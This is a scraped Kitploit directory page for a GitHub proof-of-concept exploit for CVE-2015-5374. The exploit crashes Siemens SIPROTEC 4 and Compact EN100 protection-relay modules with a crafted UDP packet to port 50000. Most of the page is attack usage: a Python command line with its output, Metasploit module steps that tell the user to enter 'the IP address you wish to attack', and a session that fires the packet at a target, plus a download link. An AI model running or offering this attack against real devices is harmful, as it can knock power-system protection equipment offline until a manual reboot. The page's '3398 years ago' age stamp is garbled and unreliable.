Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2015-5374-DoS-PoC — DoS exploit for CVE-2015-5374 targeting Siemens SIPROTEC 4 and Compact EN100 Ethernet modules via a crafted UDP packet to port 50000, with an included Metasploit auxiliary module. | Kitploit
Tools/GitHubGitHub/can/cve-2015-5374-dos-poc
Exploit FrameworksVulnerability AnalysisExploitationSCADA/ICS SecurityPenetration Testing
GitHubcan/cve-2015-5374-dos-poc

CVE-2015-5374-DoS-PoC

DoS exploit for CVE-2015-5374 targeting Siemens SIPROTEC 4 and Compact EN100 Ethernet modules via a crafted UDP packet to port 50000, with an included Metasploit auxiliary module.

View Repository
3398 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service

This code sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected device. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.

root@kitploit:~
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!

Metasploit Module

This module sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected device. A manual reboot is required to return the device to service.

Verification Steps

  1. Do: use auxiliary/dos/scada/siemens_siprotec4
  2. Do: set RHOST [Target IP], replacing with the IP address you wish to attack.
[Target IP]
  • Do: run
  • If the Siemens SIPROTEC 4 or Compact device has one of the vulnerable versions, it will immediately crash.
  • Options

    set RHOST [Target IP], set RPORT [Target Port (Default 50000)].

    Scenarios

    root@kitploit:~
    msf auxiliary(siemens_siprotec4) > info
    
         Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
       Module: auxiliary/dos/scada/siemens_siprotec4
      License: Metasploit Framework License (BSD)
         Rank: Normal
    
    Provided by:
    M. Can Kurnaz
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  50000            yes       The target port (UDP)
    
    Description:
    This module sends a specially crafted packet to port 50000/UDP 
    causing a denial of service of the affected (Siemens SIPROTEC 4 and 
    SIPROTEC Compact) devices. A manual reboot is required to return the 
    device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
    have been assigned to this vulnerability.
    
    References:
    https://www.exploit-db.com/exploits/44103/
    https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
    
    msf auxiliary(siemens_siprotec4) > show options 
    
    Module options (auxiliary/dos/scada/siemens_siprotec4):
    
     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     RHOST                   yes       The target address
     RPORT  50000            yes       The target port (UDP)
    
    msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
    rhost => 192.168.1.61
    msf auxiliary(siemens_siprotec4) > run
    
    [*] Sending DoS packet ... 
    [*] Auxiliary module execution completed
    msf auxiliary(siemens_siprotec4) > 
    
    Download Tool